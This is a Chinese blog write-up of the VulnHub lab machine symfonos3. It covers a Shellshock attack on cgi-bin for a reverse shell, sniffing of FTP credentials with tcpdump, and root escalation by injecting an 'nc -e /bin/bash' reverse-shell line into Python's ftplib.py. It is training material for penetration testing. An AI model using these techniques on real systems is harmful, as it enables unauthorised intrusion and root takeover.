OSCP- symfonos3 writeup

最新推荐文章于 2023-08-26 15:50:18 发布
最新推荐文章于 2023-08-26 15:50:18 发布
阅读量451 收藏
点赞数
文章标签: OSCP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jiajiajiang_/article/details/105809723
版权

主机来源:www.vulnhub.com

下载地址:https://download.vulnhub.com/symfonos/symfonos3v2.7z

发现IP

在这里插入图片描述
IP为10.0.3.149

nmap

在这里插入图片描述
21和22端口看了看没有已知漏洞,我们去80
先扫下目录再说
在这里插入图片描述
先访问80端口,看到是一张图片,直接ctrl+U看一下
在这里插入图片描述
这里貌似是提示了些什么
接着访问刚才发现的gate目录,也是一张图片,也没有提示
然后去看cgi-bin目录
在这里插入图片描述
没有权限,可能这里有问题,我们要找下级目录,我没有暴破出来,想了想刚才提示的句子,试了下加个underworld
在这里插入图片描述
可以访问,大概这里有cgi-bin的漏洞
这里借鉴了几篇文章

https://blog.csdn.net/xiaoshan812613234/article/details/42147955
https://blog.csdn.net/qq_36869808/article/details/104005219

CVE-2014-6271

我们在burp中实现,用curl也可以,加-A参数

在这里插入图片描述
要提前监听443端口,nc -lvp 443
然后发送数据包,得到shell
在这里插入图片描述

tcpdump

然后sudo -l无果,也没有特殊权限的文件,这里我看了wp,再来tcpdump
先把pspy传过去执行一下
https://github.com/DominicBreuker/pspy
在这里插入图片描述
看到了ftp,tcpdump一下(这里看了一下tcpdump的权限竟然是777)

tcpdump -i lo -w ppp.cap

直接读文件,发现了另一个用户的用户名密码

在这里插入图片描述
可以直接登录

提权

登录之后需要提权
我们知道ftpclient.py是root用户执行的,想着直接修改.py文件,但发现没有写权限
在这里插入图片描述
我们读一下这个文件
在这里插入图片描述
我们去修改他引用的模块
在这里插入图片描述
从前面我知道他用的是python2.7
在这里插入图片描述
故我们去修改/usr/lib/python2.7/ftplib.py文件
在中间加一句

os.system("nc 127.0.0.1 12344 -e /bin/bash")

在这里插入图片描述
同时开启监听

nc -lvp 12344

提权成功
在这里插入图片描述

一支神经病
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
OSCP - symfonos writeup
Jiajiajiang_的博客
04-30 485
主机来源:www.vulnhub.com 下载地址:https://download.vulnhub.com/symfonos/symfonos1.7z 发现IP IP为10.0.3.150 nmap SMB 直接使用SMB协议,使用anonymous用户登录 发现一个文件 我猜有人用了这些密码 还发现一个用户 试一下用上面的密码登录下helios smbclient //10.0....
oscp——symfonos:3
热门推荐
王嘟嘟的博客
01-16 1万+
0x00 前言 这个是练习的第6个机子。 目标地址 https://www.vulnhub.com/entry/symfonos-3,332/ 参考文章 https://www.wandouip.com/t5i400700/ https://cloud.tencent.com/developer/article/1523899 0x01 实验 1.信息收集 1.1 ip收集 1.2 开放端口 ...
OSCP - FourAndSix2 writeup
Jiajiajiang_的博客
04-14 326
主机来源:www.vulnhub.com 下载地址:https://download.vulnhub.com/fourandsix/FourAndSix2.ova 发现IP 安装成功后,查找此虚拟机的IP,我使用的是netdiscover netdiscover -i eth0 -r 10.0.3.1/24 是10.0.3.137 nmap nmap -sV -p- 10.0...
OSCP - Raven writeup
Jiajiajiang_的博客
04-08 384
主机来源:www.vulnhub.com 下载地址:https://download.vulnhub.com/raven/Raven.ova 发现IP 安装成功后,查找此虚拟机的IP,我使用的是netdiscover netdiscover -i eth0 -r 10.0.3.1/24 发现IP:10.0.3.140 nmap nmap -sV -p- 10.0.3...
OSCP - SickOS:1.1 writeup
Jiajiajiang_的博客
04-15 698
主机来源:www.vulnhub.com 下载地址:https://download.vulnhub.com/sickos/sick0s1.1.7z 发现IP 安装成功后,查找此虚拟机的IP,我使用的是netdiscover 地址为10.0.3.143 nmap nmap -sV -p- 10.0.3.143 漏扫 想了一下突破口肯定不是ssh,就从3128端口入手把...
java红酒网站源码-OSCP-Survival:OSCP-生存
06-05
java网站源码OSCP-生存 这是一个克隆 这也可以查看 OSCP-生存指南 注意:本文档将目标 ip 称为导出变量 $ip。 要在命令行上设置此值,请使用以下语法: 出口ip=192.168.1.100 目录 卡利Linux 将目标 IP 地址设置为$...
java红酒网站源码-oscp-notes:oscp-notes
06-05
java网站源码OSCP - PWK(使用 Kali 进行渗透测试)注意事项 完成整个 OSCP 课程的完整 OSCP 笔记 目录 卡利Linux 将目标 IP 地址设置为$ip系统变量export ip=192.168.1.100 查找文件的位置locate sbd.exe 在$PATH...
java红酒网站源码-OSCP-Notes:OSCP-笔记
06-05
java网站源码OSCP-笔记 卡利Linux 将目标 IP 地址设置为$ip系统变量export ip=192.168.1.100 查找文件的位置locate sbd.exe 在$PATH环境变量中搜索目录which sbd 查找名称中包含特定字符串的文件的搜索: find / -...
OSCP-PWK:https
04-27
OSCP 提供了更好的阅读体验,因为回购协议大多类似于草稿和备份。 注释和备忘单位于Wiki页面中。 回购中充斥着TryHackMe编写的内容和二进制文件。 卡利配置 ohmyzsh + powerlevel10K + tmux Kali 2020.3的提示:...
OSCP-PREP
03-18
"OSCP-PREP"是一个专门针对OSCP考试的准备资源,其中包含了丰富的学习材料,旨在帮助考生全面掌握渗透测试的基础知识和高级技巧。在这个过程中,Python语言扮演了不可或缺的角色,因为它是渗透测试中最常用的编程...
SYMFONOS3.1:Desarrollo del CTF SYMFONOS 3.1
04-05
SYMFONOS3.1 Desarrollo del CTF SYMFONOS 3.1 1.虚拟机配置 虚拟的Descargar lamáquina: ://www.vulnhub.com/entry/symfonos-31,332/ 重要事项:3.1版本的问题否不能完全解决。 2.埃斯卡尼奥·德波多斯 nmap -n -P0 -p- -sC -sV -O -T5 -oA full 10.10.10.153 Nmap scan report for 10.10.10.153 Host is up (0.00047s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5b 22/tcp open ssh OpenSSH 7.
vulnhub - /symfonos-3 (考点:shellshock & tcpdump /cap & linux修改py提权)
冬萍子癸水
04-26 835
https://www.vulnhub.com/entry/symfonos-3,332/ nat网络 arp-scan -l 扫出多的那个IP就是靶机 nmap 21想到ftp进去找文件,pro这个1,3 5 版本有漏洞,这个靶机系列的上一台有,joy靶机也有。之前都讲了 22想到可能ssh登录 80web搜集信息 PORT STATE SERVICE VERSION 21/tcp o...
OSCP - symfonos2 writeup
Jiajiajiang_的博客
04-27 483
主机来源:www.vulnhub.com 下载地址:https://download.vulnhub.com/symfonos/symfonos2.7z 发现IP 安装成功后,查找此虚拟机的IP,我使用的是netdiscover nmap SMB 尝试使用SMB服务,使用anonymous用户登录, 有一个log.txt的文件,下载下来 读文件,发现shad...
vulhub上oscp InfoSec靶机渗透测试writeup
qq_44635376的博客
02-05 655
这里写目录标题信息搜集nmap搜集靶机信息访问80端口网站,探索网站信息阅读网页内容搜集到一个有效信息(这台主机的用户名是oscp)发现80端口下有/secret.txt文件,我们直接去访问看看,发现一串字符,这时候猜测应该是加密的什么重要内容,很兴奋。接下来我们要解密。这串加密像是base64加密,于是我在将密文下载到kali虚拟机中使用secret.txt命名。然后使用命令base64 -d secret.txt > private_key解密并将内容保存到private_key文件中,解密以后的
OSCP 2023 challenge Writeup-Medtech
fuckskyboy的博客
08-26 7259
OSCP lab writeup
学习笔记-symfonos3-WalkThrough
人饭子的博客
11-04 334
symfonos3-WalkThrough 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 靶机地址 https://www.vulnhub.com/entry/symfonos-3,332/ Description Intermediate real life based machine designed to test ...
Symfonos:3 Vulnhub Walkthrough
Globalizationa的博客
08-23 268
主机扫描: ╰─ nmap -p1-65535 -sV -A -sT 10.10.202.130 Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-04 15:20 CSTNmap scan report for 10.10.202.130Host is up (0.00085s latency).Not shown: 65532 closed portsPORT STATE SERVICE VERSION21/tcp open ftp ...
『VulnHub系列』symfonos: 3-Walkthrough
ins1ght的博客
10-16 1022
靶机发布日期:2019年7月20日。经过了曲折的页面、目录枚举,发现shellshock漏洞,随后使用MSF获取到了shell。提权过程中先后使用手工、脚本对信息进行收集,最后使用pspy发现了root权限运行的ftpclient.py脚本。tcpdump嗅探到ftp服务的用户名、密码,随后登录SSH,修改ftpclient.py脚本获得root权限。
oscp——symfonos:1
王嘟嘟的博客
01-15 1477
0x00 前言 这个是练习的第四个机子。 目标地址 https://www.vulnhub.com/entry/symfonos-1,322 参考文章 https://www.jianshu.com/p/4dec72be5498 0x01 实验 1.信息收集 1.1 目标IP 1.2 目标端口 22,25,80,139,445 2.攻击尝试 2.1 端口攻击尝试 21端口,就算知道没用也是要爆...
oscp 2023 challenge writeup-medtech-csdn博客
最新发布
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP证书的重要性和它在信息安全领域的认可度。接着,作者向读者介绍了挑战项目MedTech的背景和目标。MedTech是一个模拟医疗技术公司的网络环境,参与者需要在该环境中寻找漏洞、获取权限,最终控制主机,获取FLAG。 在解决这个挑战的过程中,作者详细介绍了使用的工具和技术。例如,他讲解了利用漏洞扫描工具Nmap进行主机发现和服务探测的步骤,以及如何使用Metasploit框架进行漏洞利用和提权。 博客中还涵盖了其他一些有关网络渗透测试的技术,如枚举、社会工程学和Web应用程序漏洞利用。作者详细解释了每个技术的原理和实际应用。 在解决MedTech挑战的过程中,作者还分享了一些遇到的困难和技巧。他提到了一些常见的错误和陷阱,并分享了如何避免它们的经验。 最后,作者总结了整个挑战的过程,并分享了他在完成挑战时的成就感和收获。他强调了在这个过程中学到的技能和知识的重要性,并鼓励读者积极参与类似的挑战和项目。 这篇博客不仅提供了对OSCP挑战赛的深入了解,而且为读者提供了解决类似问题的思路和方法。它对于那些对信息安全和网络渗透感兴趣的读者来说是一个很有价值的参考资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值